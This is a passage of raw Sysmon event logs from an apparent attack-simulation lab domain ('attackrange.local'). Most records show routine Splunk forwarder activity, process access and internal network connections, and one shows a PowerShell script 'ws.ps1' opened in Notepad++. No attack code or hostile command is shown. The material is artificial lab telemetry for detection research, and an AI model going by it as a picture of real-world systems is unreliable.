Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001052424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.760{466BC892-F6E4-60EB-AD7D-00000000CF01}8884C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\test\ws.ps1"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.462{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA7E91BB9FDEA0AC33527A5693AB939,SHA256=CB82CC2834DEA65E94F10105F9093E742B9F579146D5234412D0F6A70FDD4868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:40.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6D6597BC4C7A7DEF3A3FB5B07096FDC,SHA256=4467F43FDC6BBF75EA1B50AE0E1C01C044FE964393C4B479366B7E20E966D51E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:41.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBF117E96FC513BB7862DF1080E1B9A1,SHA256=BF1E39E1BF898C51947C219B7FF89FD4726E311D07A53828DBA6258848366725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:41.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FC17F9AB1A38683C7F849926C778263,SHA256=7F2D58237004975103C3FA5431EB5BBAD5B5F6869CBC2B1D9DF211B49A3C5C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:41.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812C749CB07E36AAC3BBA0B8AA31D43C,SHA256=B74AC0C8B51A9486AE3DE1834896F48AC17B74CEFA9693605A484433E8FE799E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:34.316{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-59904-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001052435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:42.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5670D1AFDF4A7C196BB9AD7A29AA24E6,SHA256=2A00032B15E2A0CB5A565AE610B5D422C05A4A7F78DDD62D6AAD520737D8EF61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:42.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72DFF7847313E32976A22B30D8A0D60B,SHA256=EBEB68AC0B23563FBA1992C59DE33CECFDCBC107CDC93C833420BED65E3D1AB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:40.387{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57385-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:35.645{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51162-false10.0.1.12-8000- 23542300x80000000000000001052438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:43.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7641E15AE4FACA59B66BEC14300CFE37,SHA256=5C2B8F2468641ECD838909D699629A990D5C445E6D8A0D0F4D0AC80A6DC2C220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:43.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF72DE0074791039699A1230DDC72F80,SHA256=71613BBAE09B31776298B4BC71431C7FB398106932DB923871A1FF2A381A2A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:43.142{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AA359AD0FE4743E74D97B4A7241F0E5,SHA256=473484EBB446AC791DC047F203D0F271BF07BE5F2E4E3789EBE5867D16AABFB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:44.526{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=789A21D3E7AA629DC0094EF64F63DA54,SHA256=BAC7A6FB018EF2BE653DE87D1AB5C9578E924ED620845281954640F1328A64FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:44.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C0AB490FBE7A06A934E4A1BC6EBCA60,SHA256=1B4C59FAB17B6309A923BE4396FA2C2074E5CC6ED42DFB153A5E56CB1F718E08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:45.527{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26ACF9AEB41AC34F48101865FB68D093,SHA256=71463E53068B7EF3E3D28AC23D315EC5DBC5B8AE5B7CBD54EE8B2040DDCE461C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:45.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1790D6C7204ABF1C636F874294CED577,SHA256=823ED9380E6BF46FEE1282999AF037FA7C1BD1B2A0B7BD485955F5FFCF91003B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:46.542{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD47F72EA3D2D15AD0890FCD499F7DB,SHA256=D637AFB8A1F45CE7D4055ADF61769A6C9C741D2EC564EEE743A76AE7804DF934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:46.270{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C48B28379443F9B322026ADB9E84A7,SHA256=7B8680F89F1ABF12907F82E85D28EF96DFFA51E07823047E9A7EDA1E780AD8D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:47.559{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3FDCE659D2F66D0855C51C15554559,SHA256=DA576FB7747251B9766D1EAB3E30C1B236F807E588C29FB214F7A9B4A94A8855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:46.277{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57386-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:47.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99B785D79AF783900B34295A8312024B,SHA256=92D99E8012E62D292A34C7ECD55BD7C29499661DC765086F7EE86C27F4051FE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.675{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51163-false10.0.1.12-8000- 23542300x80000000000000001052444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:48.580{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E146B4E8A3EB2F42714A0E0E4D2E025,SHA256=B2D2B1A037AE84C2267BE251A02C9E0CA9B7D8CBD65D66CAEA9969AB0EEBDDF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:48.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B91C2D785AA1B9D4C37EB4115A89DECD,SHA256=CF51D605FD47B6D0AE6D6150C604380CE32D8F644E4C62CC3798A184AEFE9530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:49.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C1CACA6CB0403F84CC6331221129F2,SHA256=0E004A7419CAC024B3E42E372CE447481F1600BB0BDC57643F7BAA8090B0C8A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:49.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F7D48B0197326A5991CD9A15D8F05D,SHA256=CC69227B5494DD139C77E433CA8DC8ADDEF5755DE034901F54A6344B1866A89C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.910{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.910{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.910{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.910{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.894{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.894{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.894{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.896{466BC892-F6EE-60EB-AF7D-00000000CF01}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.626{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668D082467147352625EEF21442897C9,SHA256=20C8FE62F28DBB0E79CB13388EDEDFA8492A00C654C493C1A2BDAF4EB1DFD56D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:50.333{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4694DB17F42F9B15AD0B75BFB3ADEF77,SHA256=D16AEA7C084A300B0C5A34C2D29BD62FBADA2E4813E80752472D585B7B35712C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.563{466BC892-F6EE-60EB-AE7D-00000000CF01}93369892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 